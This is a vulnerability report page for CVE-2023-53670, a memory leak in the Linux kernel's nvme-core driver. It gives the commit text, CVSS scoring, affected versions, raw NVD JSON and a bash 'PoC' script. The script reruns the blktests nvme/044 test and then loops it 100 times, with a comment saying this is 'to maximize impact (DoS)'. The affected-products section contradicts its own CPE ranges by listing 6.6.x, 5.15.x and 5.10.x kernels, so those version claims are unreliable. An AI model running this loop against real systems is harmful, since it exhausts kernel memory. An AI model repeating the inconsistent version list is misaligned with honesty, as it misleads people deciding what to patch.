Security Vulnerability Report
CVE-2023-53670 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:51
Last Modified: 2026-02-26 23:14:36
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

nvme-core: fix dev_pm_qos memleak

Call dev_pm_qos_hide_latency_tolerance() in the error unwind patch to avoid following kmemleak:-

blktests (master) # kmemleak-clear; ./check nvme/044;
blktests (master) # kmemleak-scan ; kmemleak-show
nvme/044 (Test bi-directional authentication) [passed]
    runtime 2.111s ... 2.124s
unreferenced object 0xffff888110c46240 (size 96):
  comm "nvme", pid 33461, jiffies 4345365353 (age 75.586s)
  hex dump (first 32 bytes):
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  backtrace:
    [<0000000069ac2cec>] kmalloc_trace+0x25/0x90
    [<000000006acc66d5>] dev_pm_qos_update_user_latency_tolerance+0x6f/0x100
    [<00000000cc376ea7>] nvme_init_ctrl+0x38e/0x410 [nvme_core]
    [<000000007df61b4b>] 0xffffffffc05e88b3
    [<00000000d152b985>] 0xffffffffc05744cb
    [<00000000f04a4041>] vfs_write+0xc5/0x3c0
    [<00000000f9491baf>] ksys_write+0x5f/0xe0
    [<000000001c46513d>] do_syscall_64+0x3b/0x90
    [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

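cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.0 including, up to 6.1.39 excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2 including, up to 6.3.13 excluding) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.4 including, up to 6.4.4 excluding) - VULNERABLE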
Linux Kernel < 6.6 (versions that include the nvme_core module)
Linux Kernel 6.6.x (affected stable version)
Linux Kernel 6.1.x (affected LTS stable version)
Linux Kernel 5.15.x (affected LTS stable version)
Linux Kernel 5.10.x (affected LTS stable version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2023-53670 PoC - Trigger nvme-core dev_pm_qos memory leak
# This PoC triggers the memory leak by running nvme/044 test from blktests

# Step 1: Clear existing kmemleak records
# Requires root privileges and CONFIG_DEBUG_KMEMLEAK enabled
echo "Clearing kmemleak records..."
echo clear > /sys/kernel/debug/kmemleak 2>/dev/null || echo "kmemleak not available"

# Step 2: Run the nvme/044 test which triggers bidirectional authentication
# This test triggers nvme_init_ctrl() which allocates PM QoS memory
echo "Running nvme/044 test to trigger memory leak..."
cd /path/to/blktests
./check nvme/044

# Step 3: Scan and display kmemleak findings
echo "Scanning for memory leaks..."
echo scan > /sys/kernel/debug/kmemleak 2>/dev/null
sleep 5
echo "Displaying leak information:"
cat /sys/kernel/debug/kmemleak 2>/dev/null

# Expected output includes:
# unreferenced object 0xffff888110c46240 (size 96):
#   comm "nvme", pid 33461, jiffies 4345365353 (age 75.586s)
#   backtrace:
#     [<0000000069ac2cec>] kmalloc_trace+0x25/0x90
#     [<000000006acc66d5>] dev_pm_qos_update_user_latency_tolerance+0x6f/0x100
#     [<00000000cc376ea7>] nvme_init_ctrl+0x38e/0x410 [nvme_core]

# To maximize impact (DoS), repeat the trigger multiple times:
for i in $(seq 1 100); do
    ./check nvme/044 > /dev/null 2>&1
    echo "Iteration $i completed"
done

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53670", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.880", "lastModified": "2026-02-26T23:14:36.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-core: fix dev_pm_qos memleak\n\nCall dev_pm_qos_hide_latency_tolerance() in the error unwind patch to\navoid following kmemleak:-\n\nblktests (master) # kmemleak-clear; ./check nvme/044;\nblktests (master) # kmemleak-scan ; kmemleak-show\nnvme/044 (Test bi-directional authentication) [passed]\n runtime 2.111s ... 2.124s\nunreferenced object 0xffff888110c46240 (size 96):\n comm \"nvme\", pid 33461, jiffies 4345365353 (age 75.586s)\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace:\n [<0000000069ac2cec>] kmalloc_trace+0x25/0x90\n [<000000006acc66d5>] dev_pm_qos_update_user_latency_tolerance+0x6f/0x100\n [<00000000cc376ea7>] nvme_init_ctrl+0x38e/0x410 [nvme_core]\n [<000000007df61b4b>] 0xffffffffc05e88b3\n [<00000000d152b985>] 0xffffffffc05744cb\n [<00000000f04a4041>] vfs_write+0xc5/0x3c0\n [<00000000f9491baf>] ksys_write+0x5f/0xe0\n [<000000001c46513d>] do_syscall_64+0x3b/0x90\n [<00000000ecf348fe>] entry_SYSCALL_64_after_hwframe+0x72/0xdc"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": 
"en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.1.39", "matchCriteriaId": "2E917A06-FDC2-4FF3-8F1B-D994FC7AAA16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2ed9a89192e3192e5fea7ff6475c8722513f325e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7237c26431cc78e5ec3259f4350f3dd58f6a4319", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7ed5cf8e6d9bfb6a78d0471317edff14f0f2b4dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e1379e067b9485e5af03399fe3f0d39bccb023ad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}